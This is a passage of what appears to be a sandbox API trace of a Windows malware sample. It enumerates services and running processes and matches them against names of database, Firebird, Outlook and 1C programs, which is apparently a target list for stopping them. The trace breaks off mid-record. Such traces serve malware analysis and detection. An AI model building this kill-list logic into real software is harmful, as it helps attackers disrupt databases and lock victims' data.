[0057.005] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0057.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0057.005] lstrlenW (lpString="PcaSvc") returned 6 [0057.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0057.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0057.005] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0057.005] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0057.005] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0057.005] lstrlenW (lpString="PlugPlay") returned 8 [0057.005] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0057.005] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0057.005] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0057.006] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0057.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0057.006] lstrlenW (lpString="Power") returned 5 [0057.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0057.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0057.006] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0057.006] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0057.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0057.006] lstrlenW (lpString="ProfSvc") returned 7 [0057.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0057.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0057.006] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0057.006] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0057.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0057.006] lstrlenW (lpString="RpcEptMapper") returned 12 [0057.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0057.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0057.006] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0057.006] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0057.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0057.006] lstrlenW (lpString="RpcSs") returned 5 [0057.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0057.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0057.006] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0057.006] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0057.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0057.006] lstrlenW (lpString="SamSs") returned 5 [0057.006] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0057.006] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0057.006] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0057.006] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0057.006] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0057.007] lstrlenW (lpString="Schedule") returned 8 [0057.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0057.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0057.007] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0057.007] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0057.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0057.007] lstrlenW (lpString="SENS") returned 4 [0057.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0057.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0057.007] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0057.007] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0057.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0057.007] lstrlenW (lpString="ShellHWDetection") returned 16 [0057.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0057.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0057.007] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0057.007] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0057.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0057.007] lstrlenW (lpString="Spooler") returned 7 [0057.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0057.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0057.007] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0057.007] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0057.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0057.007] lstrlenW (lpString="swprv") returned 5 [0057.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0057.007] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0057.007] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0057.007] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0057.007] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0057.007] lstrlenW (lpString="SysMain") returned 7 [0057.007] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0057.008] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0057.008] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0057.008] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0057.008] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0057.008] lstrlenW (lpString="Themes") returned 6 [0057.008] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0057.008] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0057.008] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0057.008] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0057.008] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0057.008] lstrlenW (lpString="TrkWks") returned 6 [0057.008] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0057.008] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0057.008] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0057.008] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0057.008] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0057.008] lstrlenW (lpString="UxSms") returned 5 [0057.008] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0057.008] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0057.008] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0057.008] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0057.008] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0057.008] lstrlenW (lpString="VSS") returned 3 [0057.008] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0057.008] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0057.008] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0057.008] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0057.008] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0057.008] lstrlenW (lpString="WdiServiceHost") returned 14 [0057.008] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0057.008] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0057.009] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0057.009] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0057.009] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0057.009] lstrlenW (lpString="WdiSystemHost") returned 13 [0057.009] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0057.009] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0057.009] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0057.009] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0057.009] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0057.009] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0057.009] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0057.009] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0057.009] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0057.009] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0057.009] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0057.009] lstrlenW (lpString="Winmgmt") returned 7 [0057.009] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0057.009] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0057.009] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0057.009] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0057.009] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0057.009] lstrlenW (lpString="WPDBusEnum") returned 10 [0057.009] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0057.009] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0057.009] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0057.009] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0057.009] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0057.009] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6c08c8 | out: hHeap=0x5d0000) returned 1 [0057.009] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f8 [0057.012] Process32FirstW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0057.012] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0057.013] lstrlenW (lpString="System") returned 6 [0057.013] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0057.013] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0057.013] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0057.013] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0057.013] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0057.013] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0057.013] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0057.013] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0057.014] lstrlenW (lpString="smss.exe") returned 8 [0057.014] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0057.014] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0057.014] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0057.014] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0057.014] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0057.014] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0057.014] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0057.014] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0057.015] lstrlenW (lpString="csrss.exe") returned 9 [0057.015] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0057.015] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0057.015] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0057.015] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0057.015] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0057.015] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0057.015] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0057.015] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0057.016] lstrlenW (lpString="wininit.exe") returned 11 [0057.016] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0057.016] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0057.016] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0057.016] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0057.017] lstrlenW (lpString="csrss.exe") returned 9 [0057.017] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0057.018] lstrlenW (lpString="winlogon.exe") returned 12 [0057.018] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0057.019] lstrlenW (lpString="services.exe") returned 12 [0057.019] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0057.020] lstrlenW (lpString="lsass.exe") returned 9 [0057.020] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0057.020] lstrlenW (lpString="lsm.exe") returned 7 [0057.020] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.021] lstrlenW (lpString="svchost.exe") returned 11 [0057.021] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.022] lstrlenW (lpString="svchost.exe") returned 11 [0057.022] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.022] lstrlenW (lpString="svchost.exe") returned 11 [0057.022] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.023] lstrlenW (lpString="svchost.exe") returned 11 [0057.023] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.024] lstrlenW (lpString="svchost.exe") returned 11 [0057.024] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0057.025] lstrlenW (lpString="audiodg.exe") returned 11 [0057.025] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.025] lstrlenW (lpString="svchost.exe") returned 11 [0057.025] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.026] lstrlenW (lpString="svchost.exe") returned 11 [0057.026] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0057.027] lstrlenW (lpString="dwm.exe") returned 7 [0057.027] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0057.027] lstrlenW (lpString="explorer.exe") returned 12 [0057.028] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0057.028] lstrlenW (lpString="spoolsv.exe") returned 11 [0057.028] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0057.029] lstrlenW (lpString="taskhost.exe") returned 12 [0057.029] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.030] lstrlenW (lpString="svchost.exe") returned 11 [0057.030] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0057.030] lstrlenW (lpString="taskeng.exe") returned 11 [0057.030] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0057.031] lstrlenW (lpString="taskhost.exe") returned 12 [0057.031] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="carried trinity.exe")) returned 1 [0057.032] lstrlenW (lpString="carried trinity.exe") returned 19 [0057.032] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="heaven.exe")) returned 1 [0057.032] lstrlenW (lpString="heaven.exe") returned 10 [0057.206] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dell.exe")) returned 1 [0057.207] lstrlenW (lpString="dell.exe") returned 8 [0057.207] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="consequence lonely nato.exe")) returned 1 [0057.208] lstrlenW (lpString="consequence lonely nato.exe") returned 27 [0057.208] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gotten_commit_philip.exe")) returned 1 [0057.209] lstrlenW (lpString="gotten_commit_philip.exe") returned 24 [0057.209] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="til ear equal.exe")) returned 1 [0057.209] lstrlenW (lpString="til ear equal.exe") returned 17 [0057.209] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="itunes-bring.exe")) returned 1 [0057.210] lstrlenW (lpString="itunes-bring.exe") returned 16 [0057.210] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tide_instances_ee.exe")) returned 1 [0057.211] lstrlenW (lpString="tide_instances_ee.exe") returned 21 [0057.211] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="philadelphia.exe")) returned 1 [0057.212] lstrlenW (lpString="philadelphia.exe") returned 16 [0057.212] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="litigation_rows_careers.exe")) returned 1 [0057.212] lstrlenW (lpString="litigation_rows_careers.exe") returned 27 [0057.213] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ict virginia cameras.exe")) returned 1 [0057.213] lstrlenW (lpString="ict virginia cameras.exe") returned 24 [0057.213] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x438, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fraud stuck.exe")) returned 1 [0057.214] lstrlenW (lpString="fraud stuck.exe") returned 15 [0057.214] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, 